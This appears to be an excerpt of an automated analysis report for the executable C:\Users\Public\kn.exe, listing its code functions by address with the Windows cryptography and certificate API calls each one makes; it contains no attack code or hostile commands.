Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF098B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,		25_2_00007FF67DF098B0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED3590 CryptImportPublicKeyInfoEx2,#205,GetLastError,#357,#357,#357,SetLastError,		25_2_00007FF67DED3590
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEFF570 CryptHashCertificate,SetLastError,		25_2_00007FF67DEFF570
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE9B55C CertFreeCertificateContext,CertCreateCertificateContext,GetLastError,CertDuplicateCertificateContext,#357,#358,CertCompareCertificateName,CryptVerifyCertificateSignatureEx,GetLastError,#357,#357,CertFreeCertificateContext,CertVerifyTimeValidity,#357,		25_2_00007FF67DE9B55C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE53918 #357,#357,#357,#357,CertFindExtension,CryptDecodeObject,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,		25_2_00007FF67DE53918
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED391C CryptVerifySignatureW,#205,GetLastError,#357,#359,#357,SetLastError,		25_2_00007FF67DED391C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEFF918 CryptEncrypt,GetLastError,LocalFree,LocalAlloc,#357,LocalFree,		25_2_00007FF67DEFF918
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE438FC RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,		25_2_00007FF67DE438FC
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF09580 memset,#357,CryptCreateHash,GetLastError,#357,CryptGenRandom,GetLastError,CryptHashData,GetLastError,CryptSignHashW,GetLastError,LocalAlloc,CryptSignHashW,GetLastError,CryptImportPublicKeyInfo,GetLastError,CryptVerifySignatureW,GetLastError,#357,CryptDestroyHash,CryptDestroyKey,LocalFree,CryptReleaseContext,		25_2_00007FF67DF09580
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEA18DC CertFindExtension,CryptDecodeObject,GetLastError,#357,		25_2_00007FF67DEA18DC
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEBB8D0 I_CryptGetLruEntryData,#357,		25_2_00007FF67DEBB8D0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEA9878 strcmp,strcmp,strcmp,#357,#357,CompareFileTime,LocalFree,CryptMsgClose,CertCloseStore,CompareFileTime,#357,#357,		25_2_00007FF67DEA9878
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE67884 GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,		25_2_00007FF67DE67884
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED3860 CryptSetProvParam,#205,GetLastError,#357,#357,#357,SetLastError,		25_2_00007FF67DED3860
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEBD850 #357,Sleep,BCryptCloseAlgorithmProvider,I_CryptFreeLruCache,		25_2_00007FF67DEBD850
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEC184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,		25_2_00007FF67DEC184C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEBB808 I_CryptFindLruEntry,I_CryptGetLruEntryData,#357,I_CryptReleaseLruEntry,		25_2_00007FF67DEBB808
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE6F810 #223,CryptDecodeObjectEx,GetLastError,CertFindAttribute,CertFindAttribute,GetLastError,#357,LocalFree,LocalFree,		25_2_00007FF67DE6F810
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEFF7FC CryptExportKey,GetLastError,#357,LocalAlloc,CryptExportKey,GetLastError,LocalFree,		25_2_00007FF67DEFF7FC
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEE97E4 LoadCursorW,SetCursor,#210,LoadCursorW,SetCursor,#357,EnableWindow,SetWindowLongPtrW,SetWindowLongPtrW,SetWindowLongPtrW,GetDlgItem,SetWindowTextW,GetDlgItem,ShowWindow,CryptUIDlgFreeCAContext,LocalFree,		25_2_00007FF67DEE97E4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE717D4 #357,#359,#357,NCryptFinalizeKey,#360,#359,#359,#357,NCryptDeleteKey,#360,#359,#359,#359,LocalFree,LocalFree,		25_2_00007FF67DE717D4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED37A4 CryptSetKeyParam,#205,GetLastError,#357,#357,#357,SetLastError,		25_2_00007FF67DED37A4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEEB794 CryptExportPublicKeyInfoEx,SetLastError,		25_2_00007FF67DEEB794
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE4B788 #140,iswdigit,CryptDecodeObject,GetLastError,#357,#357,#224,		25_2_00007FF67DE4B788
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE6D790 SslEnumProtocolProviders,#357,SslOpenProvider,SslFreeBuffer,SslFreeObject,SslFreeBuffer,#359,LocalAlloc,BCryptGetProperty,CryptFindOIDInfo,BCryptDestroyKey,BCryptDestroyKey,LocalFree,		25_2_00007FF67DE6D790
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEA577C #360,#358,CryptDecodeObject,GetLastError,#357,		25_2_00007FF67DEA577C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE9F774 CertFindExtension,#357,CryptVerifyCertificateSignature,GetLastError,GetLastError,memmove,LocalFree,		25_2_00007FF67DE9F774
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED5768 NCryptIsKeyHandle,??_V@YAXPEAX@Z,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,		25_2_00007FF67DED5768
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEFD750 LocalAlloc,CryptFormatObject,GetLastError,#358,#358,LocalFree,#357,		25_2_00007FF67DEFD750
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE6B324 CryptDecodeObject,GetLastError,#357,#357,LocalFree,		25_2_00007FF67DE6B324
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEBD30C BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,		25_2_00007FF67DEBD30C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE6D304 #357,CryptFindOIDInfo,#359,LocalAlloc,CryptEncodeObjectEx,GetLastError,LocalFree,LocalFree,LocalFree,		25_2_00007FF67DE6D304
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DECF2F0 BCryptCreateHash,#205,#357,#357,#357,#357,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,		25_2_00007FF67DECF2F0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEA92D8 CertEnumCertificatesInStore,CertGetCRLContextProperty,CertSetCTLContextProperty,GetLastError,#357,#357,CertEnumCertificatesInStore,CryptMsgControl,GetLastError,#357,CryptMsgGetAndVerifySigner,GetLastError,#357,CryptMsgGetAndVerifySigner,#357,CertFreeCertificateContext,CertGetCRLContextProperty,CertEnumCertificatesInStore,#357,#357,#207,LocalFree,#357,#357,CertFreeCertificateContext,CompareFileTime,CertFreeCertificateContext,		25_2_00007FF67DEA92D8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEB32D0 #359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,		25_2_00007FF67DEB32D0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF093A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,		25_2_00007FF67DF093A0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE992C4 memset,CryptHashCertificate,GetLastError,CryptHashCertificate,GetLastError,GetLastError,GetLastError,#357,#254,LocalAlloc,wcsstr,LocalAlloc,LocalAlloc,#357,memmove,GetLastError,GetProcAddress,GetLastError,GetLastError,#359,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FreeLibrary,		25_2_00007FF67DE992C4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE9B2B4 #357,CryptHashCertificate,GetLastError,#357,memcmp,#358,		25_2_00007FF67DE9B2B4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED32A8 CryptGetProvParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,		25_2_00007FF67DED32A8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF07290 NCryptIsKeyHandle,#359,#360,#357,#358,		25_2_00007FF67DF07290
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEFD28C CryptFindOIDInfo,CryptEnumOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,#358,		25_2_00007FF67DEFD28C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE6D240 #357,CryptFindOIDInfo,#357,LocalFree,		25_2_00007FF67DE6D240
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF07214 NCryptIsKeyHandle,#357,CryptReleaseContext,GetLastError,		25_2_00007FF67DF07214
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF071C8 BCryptDestroyKey,#360,		25_2_00007FF67DF071C8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED11C8 NCryptVerifySignature,#205,#357,#357,#357,#357,		25_2_00007FF67DED11C8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED31C0 CryptGetKeyParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,		25_2_00007FF67DED31C0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEA51A4 #360,#357,#359,#207,CryptFindOIDInfo,#357,GetLastError,#357,#207,#360,#254,#358,LocalFree,LocalFree,LocalFree,		25_2_00007FF67DEA51A4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEB3188 CryptAcquireContextW,GetLastError,#359,#359,CryptAcquireContextW,GetLastError,		25_2_00007FF67DEB3188
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF07178 BCryptCloseAlgorithmProvider,#360,		25_2_00007FF67DF07178
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEBF168 CryptDuplicateKey,GetLastError,#357,CryptEncrypt,GetLastError,CryptEncrypt,GetLastError,CryptDestroyKey,		25_2_00007FF67DEBF168
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEB5164 GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,		25_2_00007FF67DEB5164
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE93504 CreateFileW,GetLastError,#357,GetFileSize,GetLastError,#357,SetFilePointer,GetLastError,#357,CertFreeCertificateContext,CertFreeCertificateContext,CryptDestroyKey,CryptReleaseContext,CloseHandle,		25_2_00007FF67DE93504
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED34F8 CryptImportPublicKeyInfo,#205,GetLastError,#357,#357,SetLastError,		25_2_00007FF67DED34F8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF014F0 GetEnvironmentVariableW,#205,#205,#203,CryptDestroyHash,CryptReleaseContext,CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptReleaseContext,GetLastError,#357,#357,#203,#357,#357,#357,#357,#203,LocalFree,#203,#357,#357,#207,#203,#203,LocalFree,#203,#203,CryptDestroyHash,CryptReleaseContext,		25_2_00007FF67DF014F0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEEB4EC CryptDecodeObjectEx,SetLastError,		25_2_00007FF67DEEB4EC
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEFF4A0 CryptHashPublicKeyInfo,SetLastError,		25_2_00007FF67DEFF4A0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEBF488 #357,LocalAlloc,memmove,CryptDuplicateKey,GetLastError,CryptDecrypt,GetLastError,CryptDestroyKey,LocalFree,		25_2_00007FF67DEBF488
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED9480 memmove,BCryptDecrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,memmove,BCryptEncrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,		25_2_00007FF67DED9480
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF29208 #357,NCryptEnumKeys,#360,#358,		25_2_00007FF67DF29208
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEEB464 CryptEncodeObjectEx,SetLastError,		25_2_00007FF67DEEB464
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE35438 memset,#246,#357,#357,GetLastError,#357,CertFindExtension,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,		25_2_00007FF67DE35438
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,		25_2_00007FF67DED342C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF0141C GetLastError,CryptDecodeObjectEx,GetLastError,#357,LocalFree,		25_2_00007FF67DF0141C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE913F0 CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptHashData,CryptHashData,GetLastError,CryptImportPublicKeyInfo,CryptVerifySignatureW,CertCreateCertificateContext,#357,LocalFree,GetLastError,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,		25_2_00007FF67DE913F0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEB53E8 CryptEncodeObjectEx,GetLastError,#357,		25_2_00007FF67DEB53E8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEBB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,		25_2_00007FF67DEBB3D8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEE33B0 CertFindExtension,#357,CryptDecodeObject,GetLastError,#357,#357,		25_2_00007FF67DEE33B0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEB33A0 CryptVerifyCertificateSignature,CertCompareCertificateName,		25_2_00007FF67DEB33A0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF0739C CryptAcquireContextW,GetLastError,#360,#360,SetLastError,		25_2_00007FF67DF0739C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED3390 CryptGetUserKey,#205,GetLastError,#357,#357,SetLastError,		25_2_00007FF67DED3390
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE5B36C GetLastError,CryptHashCertificate,GetLastError,CryptHashCertificate2,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#357,#357,#357,LocalFree,SysFreeString,		25_2_00007FF67DE5B36C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE8B350 CryptFindLocalizedName,CertEnumPhysicalStore,GetLastError,#357,		25_2_00007FF67DE8B350
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE95338 wcsrchr,#357,#357,LocalAlloc,memmove,wcsrchr,GetLastError,#360,#357,#357,LocalFree,LocalFree,LocalFree,CryptReleaseContext,		25_2_00007FF67DE95338
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE67340 GetModuleHandleW,GetProcAddress,GetLastError,BCryptExportKey,#360,LocalAlloc,CryptHashCertificate2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalFree,		25_2_00007FF67DE67340
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF06F2C NCryptExportKey,#360,		25_2_00007FF67DF06F2C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE68F1C strcmp,LocalFree,strcmp,LocalFree,strcmp,LocalFree,strcmp,CryptDecodeObject,LocalFree,LocalFree,LocalFree,strcmp,strcmp,strcmp,strcmp,LocalFree,GetLastError,#357,GetLastError,GetLastError,		25_2_00007FF67DE68F1C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED0EF4 NCryptImportKey,#205,#359,#359,#357,		25_2_00007FF67DED0EF4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF06EA8 NCryptImportKey,#360,		25_2_00007FF67DF06EA8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEFEE94 CryptSignMessage,SetLastError,		25_2_00007FF67DEFEE94
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE70E94 GetLastError,#359,CryptGetProvParam,LocalFree,#357,LocalFree,CryptReleaseContext,		25_2_00007FF67DE70E94
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEA2E7C #223,GetLastError,#358,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,LocalFree,		25_2_00007FF67DEA2E7C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED2E6C CryptFindOIDInfo,#205,#357,#357,#357,#359,#359,#357,#357,#359,LocalFree,		25_2_00007FF67DED2E6C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF06E48 NCryptSetProperty,#360,		25_2_00007FF67DF06E48
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE60E24 #357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,GetLastError,#357,#357,#357,GetLastError,GetLastError,GetLastError,CryptDecodeObject,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,		25_2_00007FF67DE60E24
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF06DE0 NCryptCreatePersistedKey,#360,		25_2_00007FF67DF06DE0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEB4DDC GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,		25_2_00007FF67DEB4DDC
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED0DD4 NCryptGetProperty,#205,#359,#357,#359,#357,		25_2_00007FF67DED0DD4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEF8DD0 CertGetCRLContextProperty,GetLastError,#357,memcmp,CertGetCRLContextProperty,GetLastError,#357,memcmp,CertFindExtension,GetLastError,memcmp,CryptHashCertificate,GetLastError,memcmp,CryptHashPublicKeyInfo,GetLastError,memcmp,LocalFree,		25_2_00007FF67DEF8DD0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF02DAC #357,#357,CryptFindOIDInfo,LocalFree,		25_2_00007FF67DF02DAC
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED0D84 NCryptFreeObject,#205,#357,		25_2_00007FF67DED0D84
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF06D78 NCryptOpenKey,#360,		25_2_00007FF67DF06D78
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED2D78 CryptEncrypt,#205,GetLastError,#357,#357,#357,#357,SetLastError,		25_2_00007FF67DED2D78
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE89134 CryptQueryObject,GetLastError,#357,CertOpenStore,GetLastError,CertOpenStore,GetLastError,CertAddSerializedElementToStore,GetLastError,CertAddEncodedCRLToStore,GetLastError,CertAddEncodedCTLToStore,GetLastError,CertAddEncodedCertificateToStore,GetLastError,#357,CertCloseStore,		25_2_00007FF67DE89134
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF07124 BCryptGenerateKeyPair,#360,		25_2_00007FF67DF07124
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEF511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,		25_2_00007FF67DEF511C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED10D8 NCryptSetProperty,#205,#359,#357,#359,#357,		25_2_00007FF67DED10D8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED30D8 CryptGetHashParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,		25_2_00007FF67DED30D8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF070C8 BCryptSetProperty,#360,		25_2_00007FF67DF070C8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF20DB8 CryptMsgGetParam,GetLastError,#357,#357,memset,CryptMsgGetParam,GetLastError,#357,		25_2_00007FF67DF20DB8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEDB0A0 memmove,CryptDecrypt,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,memmove,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,		25_2_00007FF67DEDB0A0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE9B098 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyCRLTimeValidity,CertCompareCertificateName,CertCompareCertificateName,#357,		25_2_00007FF67DE9B098
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE7107C LocalFree,GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,#359,#357,LocalFree,		25_2_00007FF67DE7107C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF0705C BCryptGetProperty,#360,		25_2_00007FF67DF0705C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED1058 NCryptOpenStorageProvider,#205,#359,#357,		25_2_00007FF67DED1058
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE4302F #357,LocalFree,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,		25_2_00007FF67DE4302F
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE47034 #357,CertCreateCertificateContext,#357,CertDuplicateCertificateContext,CertCreateCertificateContext,CertCompareCertificateName,CryptVerifyCertificateSignature,GetLastError,#357,#357,CertFreeCertificateContext,LocalFree,CertFreeCertificateContext,		25_2_00007FF67DE47034
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEC9028 #357,#357,CryptMsgClose,CryptMsgClose,CertCloseStore,LocalFree,		25_2_00007FF67DEC9028
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED7020 NCryptDecrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptEncrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,		25_2_00007FF67DED7020
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED301C CryptGenKey,#205,GetLastError,#357,#357,#357,SetLastError,		25_2_00007FF67DED301C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF14E58 NCryptIsKeyHandle,#357,BCryptGenRandom,#360,LocalAlloc,CryptExportPKCS8,GetLastError,LocalAlloc,CryptExportPKCS8,GetLastError,NCryptIsKeyHandle,#359,#359,NCryptFinalizeKey,#360,		25_2_00007FF67DF14E58
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF0700C BCryptEnumAlgorithms,#360,		25_2_00007FF67DF0700C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED0FB4 NCryptOpenKey,#205,#359,#357,#357,		25_2_00007FF67DED0FB4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF06FAC BCryptOpenAlgorithmProvider,#360,		25_2_00007FF67DF06FAC
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF30ED0 LocalAlloc,LocalReAlloc,#357,#360,CryptFindOIDInfo,CryptFindOIDInfo,LocalAlloc,#357,memmove,_wcsnicmp,#256,#359,		25_2_00007FF67DF30ED0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE64F90 LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,#357,strcmp,GetLastError,#357,CryptMsgGetAndVerifySigner,CryptVerifyDetachedMessageSignature,GetLastError,#357,CertEnumCertificatesInStore,memcmp,#357,CertFreeCertificateContext,#357,#357,CertFreeCertificateContext,strcmp,#357,CryptMsgControl,GetLastError,#357,#357,#357,#357,		25_2_00007FF67DE64F90
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEFEF74 GetLastError,#357,CryptDecodeObject,GetLastError,GetLastError,GetLastError,LocalAlloc,memmove,LocalFree,LocalFree,LocalFree,		25_2_00007FF67DEFEF74
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEC0F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,		25_2_00007FF67DEC0F58
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEB4F50 CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,#357,LocalFree,		25_2_00007FF67DEB4F50
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF3EB38 CryptDecodeObjectEx,GetLastError,??3@YAXPEAX@Z,LocalFree,		25_2_00007FF67DF3EB38
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEC8AFC #357,CertCreateCertificateContext,GetLastError,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,CertSetCTLContextProperty,GetLastError,#357,#357,CertCloseStore,CertFreeCertificateContext,		25_2_00007FF67DEC8AFC
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE72B00 BCryptEnumContexts,#360,BCryptQueryContextConfiguration,#360,#357,BCryptFreeBuffer,#357,BCryptEnumContextFunctions,#360,#360,BCryptFreeBuffer,#358,#358,#357,BCryptFreeBuffer,		25_2_00007FF67DE72B00
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED2AE4 CryptAcquireContextW,#205,GetLastError,#359,#357,#359,SetLastError,		25_2_00007FF67DED2AE4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED0ABC BCryptVerifySignature,#205,#357,#357,#357,#357,		25_2_00007FF67DED0ABC
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED8AA0 _CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptHashData,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,		25_2_00007FF67DED8AA0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF02A78 #357,CryptAcquireCertificatePrivateKey,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,#359,#359,		25_2_00007FF67DF02A78
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE46A84 LocalAlloc,#357,memmove,CryptHashCertificate2,GetLastError,LocalAlloc,#357,memmove,LocalFree,		25_2_00007FF67DE46A84
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEBEA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,		25_2_00007FF67DEBEA7C
